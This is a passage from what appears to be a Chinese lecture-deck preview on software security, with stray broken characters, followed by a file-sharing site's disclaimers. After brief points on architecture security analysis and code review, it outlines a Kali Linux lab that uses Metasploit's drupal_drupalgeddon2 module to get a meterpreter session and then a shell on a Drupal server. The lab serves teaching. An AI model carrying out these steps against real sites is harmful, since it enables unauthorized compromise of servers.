?;蛎枋?,同時(shí)還要對(duì)軟件的安全需求或安全模型進(jìn)行建模和描述;第三步是安全分析師檢查架構(gòu)設(shè)計(jì)是否滿足安全需求或安全模型。如果不滿足,安全分析師要根據(jù)分析結(jié)構(gòu)指導(dǎo)架構(gòu)師對(duì)軟件架構(gòu)進(jìn)行重新設(shè)計(jì),并再次執(zhí)行上述檢查直到獲得安全的架構(gòu)設(shè)計(jì)為止。4.審查軟件審查是在開(kāi)發(fā)過(guò)程中對(duì)軟件的代碼和文檔的一個(gè)檢查過(guò)程,從而及早地發(fā)現(xiàn)缺陷。使用KaliLinux進(jìn)行Drupal漏洞攻擊打開(kāi)KaliLinux,輸入msfconsole啟動(dòng)攻擊平臺(tái),搜索Drupal相關(guān)漏洞。使用KaliLinux進(jìn)行Drupal漏洞攻擊啟用drupal_drupalgeddon2攻擊模塊,獲取到meterpreter會(huì)話。使用KaliLinux進(jìn)行Drupal漏洞攻擊切換到shell會(huì)話使用KaliLinux

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論